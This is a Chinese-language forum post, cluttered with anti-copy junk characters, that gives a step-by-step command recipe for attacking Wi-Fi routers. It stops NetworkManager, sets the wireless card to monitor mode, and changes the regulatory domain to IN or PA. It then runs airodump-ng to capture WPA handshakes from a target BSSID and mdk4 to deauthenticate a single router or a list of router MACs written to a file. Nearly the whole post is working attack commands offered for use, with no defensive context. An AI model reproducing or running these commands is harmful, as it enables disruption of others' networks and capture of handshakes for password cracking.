少校
- 注册时间
- 2013-3-19
- 金币
- 2070 个
- 威望
- 17 个
- 荣誉
- 0 个
累计签到:107 天 连续签到:1 天 [LV.200]无线新星
|
本帖最后由 xun73tian 于 2025-3-12 16:13 编辑
- J( v9 k' m3 }$ S7 l/ v# l( o+ Y- n6 P+ ` h, X0 y
airodump-ng抓包步骤:单网卡( ]1 G2 S4 E( M4 o
一、终端一:选择攻击的路由
& |: b- [' \7 t5 Dsystemctl stop NetworkManager8 o& K( p G2 y, ?# }' ~+ W
airmon-ng check kill' H& V W$ J; H4 X
iw reg get (查看国家监管域,默认为00)$ W% `/ x9 s4 t' k
iw reg set IN (临时设置全局国家监管域为IN)" K6 S8 `$ Q& I3 m7 `8 g% Q( U
或者
: u" Y! R, q& i! i$ e9 O/ A5 V6 i# ^7 A% liw reg set PA. M7 K5 o) V8 _* x9 G3 ?
* z5 h- G( J. j% @. d% x
iwconfig (查看无线网卡信息)
& a; _% a0 y) g& ]% s" u. p7 nairmon-ng start wlan1 (开启无线网卡监听模式)
6 J* g7 J( T# O% A- yairodump-ng wlan1 --band a (扫描5.0G的路由)
A. V# e5 T1 P或者
3 j3 r" b& o# jairodump-ng wlan1 --band bg (扫描2.4G的路由); p, c% z5 ~1 E1 U, ^: d# ]' N% F, n6 j
2 z: Y8 g) t$ L) h
airodump-ng -w 包命名 -c 信道 --bssid 路由地址 wlan1+ C6 f+ `* n8 P0 w/ a0 {" v3 `$ |
//抓取握手包,被动抓包(适应于2.4G和5.0G)
* @, ]& J) k% u& V6 d0 F; Q7 ]& r# ? h" h. Y2 c
二、终端二:mdk4攻击6 X+ X, h( `6 |
mdk4 wlan1 d -B 路由地址 (攻击具体路由)
. a6 \- x& i5 M1 H
. W' v, W- j4 rmdk4批量攻击路由:补充. H# A* X* v+ [+ @- o8 G! A
把要攻击的目标MAC写入到/root/1.txt文本中。
$ f) ` X6 ^ f7 Necho 6C:B1:58:E8:0C:60 >1.txt (覆盖输入)
4 ^/ S. U7 u0 u6 w: l2 s' eecho 6C:B1:58:E8:0C:61 >>1.txt (追加输入)5 ~) b9 S- O' ^6 ]; {! Z! I
mdk4 wlan1 d -b ./1.txt (可同时攻击2.4和5G) |
|